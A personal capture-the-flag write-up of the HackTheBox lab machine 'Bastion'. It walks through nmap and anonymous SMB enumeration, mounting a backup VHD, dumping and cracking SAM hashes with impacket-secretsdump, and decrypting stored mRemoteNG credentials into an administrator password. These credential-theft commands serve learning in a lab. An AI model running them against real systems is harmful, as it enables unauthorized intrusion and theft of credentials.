We always start with an nmap scan…..
Nmap -sC -sV -oA nmap <Target-IP>
# Nmap 7.91 scan initiated Mon Jul 5 10:55:33 2021 as: nmap -sC -sV -oA nmap 10.10.10.134 Nmap scan report for 10.10.10.134 Host is up (0.46s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0) | ssh-hostkey: | 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA) | 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA) |_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h20m57s, deviation: 1h09m13s, median: 3h00m54s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Bastion | NetBIOS computer name: BASTION\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2021-07-05T14:57:52+02:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-07-05T12:57:48 |_ start_date: 2021-07-05T04:32:51 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Jul 5 10:57:10 2021 -- 1 IP address (1 host up) scanned in 97.46 seconds
My second windows box on HackTheBox and would actually say am loving it so we are having some ports let start on eumerating SMB for some anonymous log shares.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/retired/10.10.10.134] └─$ smbclient -L //10.10.10.134/ -N Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin Backups Disk C$ Disk Default share IPC$ IPC Remote IPC SMB1 disabled -- no workgroup available
Seems we have access to the backups share on SMB let connect to it.
We are in cool let get the
note.txt first maybe we are left with a hint to keep going forward and we still have some juciy directories to check lol.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/retired/10.10.10.134] └─$ cat note.txt Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
Cool? let try to check what the system admin was talking about so let enumerate the directories.
\\10.10.10.134\Backups\WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\
Ok we have some cool files also a Virtual Hard Disk Image but the problem am facing is that it always disconnect when i try to get the file i think that what the system admin was talking about.
With some little research i was able to find a way to mount it on my Kali machine.
Mounting A VHD On Linux
First step is to install the tool
sudo apt install libguestfs-tools -y
sudo mount -t cifs //10.10.10.134/backups /mnt -o user=,password=
So we have it mounted already cool. Now we need a directory that we need to use to mount the VHD file.
sudo mkdir /mnt/Vhd
Now we are going to use guestmount to mount the directory in read-only
ro mode, and, use it with the folder we created
sudo guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /mnt/vhd
It going to take sometime so we have to wait for it to be done maybe grab a cup of coffee.
sudo su cd /mnt/vhd
Now we can try to check for interesting directories and files like dumping SAM database.
How To Extract Local SAM Database From VHD Files
Since we have mount the VHD on our Kali machine we can go ahead and dump SAM database that store credentials.
cd /Windows/System32/config cp SAM SYSTEM /tmp
NOTE:- We can also grab nts.dit if we are on a domain controller so we can crack all of the AD hashes.
Now let change to the
cd /tmp impacket-secretsdump -sam SAM -system SYSTEM local
Now that we have the hashes let try to crack it.
So i was able to crack
L4mpje password hash now since we have SSH open let try it.
We are in now let get
SYSTEM / ADMINISTRATOR
Time to get system i really have a tough time here since i know nothing about windows so i just peep at write up to know what am missing so that get me back on a track.
When I checked the user appdata I saw that mRemoteNG was installed on the box so i quickly google search about it.
mRemoteNG is a fork of mRemote: an open source, tabbed, multi-protocol, remote connections manager. mRemoteNG adds bug fixes and new features to mRemote.
It allows you to view all of your remote connections in a simple yet powerful tabbed interface.
mRemoteNG saves the connections info and credentials in a file called
Now we have administrator password but it encrypted let find a way to decrypt it.
git clone https://github.com/haseebT/mRemoteNG-Decrypt.git
python3 mremoteng_decrypt.py -s
Username:- administrator Password:- thXLHM96BeKL0ER2
Now we have credentials for administrator let hit SSH to get the root flag.
We are done.
Greeting From Muzec